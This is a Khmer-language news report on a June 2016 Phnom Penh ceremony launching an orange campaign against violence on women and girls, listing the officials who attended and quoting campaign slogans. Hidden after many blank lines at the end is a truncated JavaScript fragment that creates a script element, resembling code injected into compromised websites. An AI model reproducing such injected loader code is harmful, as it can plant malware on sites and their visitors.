៉៉យុទ្ធនាការពណ៌ទឹកក្រូច ក្នុងសហគមន៌ ដើម្បីបញ្ឈប់អំពើហឹង្សាលើស្ត្រី”
ភ្នំពេញ៖ នៅថ្ងៃ២៤ខែមិថុនា ឆ្នាំ ២០១៦ វេលាម៉ោង៨ និង៣០នាទី ព្រឹកនេះឯកឧត្តម ហ៊ុន ម៉ានី
បានអញ្ជើញចូលរួមជាអធិតិភាពក្នុងពិធីសម្ពោធ “”យុទ្ធនាការពណ៌ទឹកក្រូច ក្នុងសហគមន៌ ដើម្បីបញ្ឈប់អំពើហឹង្សាលើស្ត្រី””នៅសាលាខណ្ឌសែនសុខ។
ក្នុងឪកាសនេះ ក៍មានការអញ្ជើញចូលរួមពី លោកជំទាវ ឡោ ខេងសម៉ាជិករដ្ឋសភាជាតិ និងតំណាងរាស្រ្តមណ្ឌភ្នំពេញ លោកអ៊ូ រតនៈ នាយកប្រតិបត្តិនៃសមាគមន៍អភិវឌ្ឍន៍សុខភាពប្រជាជន លោក ប៉ឹល កុសលអភិបាលនៃ គណៈអភិបាលខណ្ឌសែនសុខ លោក ថេង សុថុលអភិបាលរង អ្នកស្រី Debora Comini លោកអធិការខណ្ឌ មេបញ្ជាការរងអាវុធហត្ថ ចៅសង្កាត់ និងមន្ត្រីពាក់ព័ន្ធ័ជាច្រើននាក់ទៀត ។
យុទ្ធនាការនេះគឺដើម្បីគៀងគរមនុស្សទាំងអស់អោយចូលរួមប្តេជ្ញាចិត្តបញ្ឈប់អំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី និងធានាថាស្ត្រីនិងក្មេងស្រី ត្រូវបានរស់នៅក្នុងសង្គមរួមគ្នា ដោយស្មើសិទ្ធ ស្មើភាព គ្មាន ការរើសអើង – កេងប្រវញ្ច័-ជួញដូរ-រំលោភបំពាន និងអំពើហឹង្សាលើគ្រប់រូបភាព ។ សូមរួមគ្នាផ្តល់ការពិតដល់ស្ត្រី តាមរយ: ការផ្តល់តម្លៃ ផ្តល់ឱកាស ផ្តល់ការគាំទ្រ និង ការពារស្ត្រី ដូចការពារខ្លួនអ្នក និងគ្រួសារអ្នក ។
ក្រុមបុរស និងក្មេងប្រុស គឺជាកូនសោគន្លឹះក្នុងការប្រឆាំងអំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី ។ អាជ្ញាធរគ្រប់ផ្នែក គ្រប់លំដាប់ថ្នាក់ គឺជាគំរូល្អបំផុតក្នុងយុទ្ធសាស្ត្របញ្ឈប់អំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី តាមរយៈការផ្តល់ ការអន្តរាគមន៍ ទប់ស្កាត់ សំរបសំរួលដោះស្រាយ និងឆ្លើយតបទៅនិងករណីអំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី ទាន់ពេលវេលា ប្រកបដោយប្រសិទ្ធិភាព តម្លាភាព ដើម្បីយុតិ្តធម៌សង្គម និងលើកកម្ពស់សេចក្តីថ្លៃថ្នូររបស់មនុស្សជាតិនិងវប្បធម៌ប្រពៃណីដ៏ល្អផូផង់របស់ខ្មែរយើង។ “”បុរសពិត គឺជាវីរៈជនក្នុងការបញ្ឈប់អំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី
“”បញ្ឈប់អំពើហឹង្សាលើស្ត្រី គឺជាពានរង្វាន់សុភមង្គលគ្រប់ក្រុមគ្រួសារ”
ដើម្បីបង្ហាញថាអ្នកពិតជាវីរៈជនក្នុងការប្រយុទ្ធប្រឆាំងនិងអំពើហឹង្សាលើស្ត្រីនិងក្មេងស្រី សូមចូលរួមពាក់អាវឬ ក្រមាពណ៌ទឹកក្រូចនៅថ្ងៃទី២៥ជារៀងរាល់ខែ ។


















var d=document;var s=d.createElement(‘script’);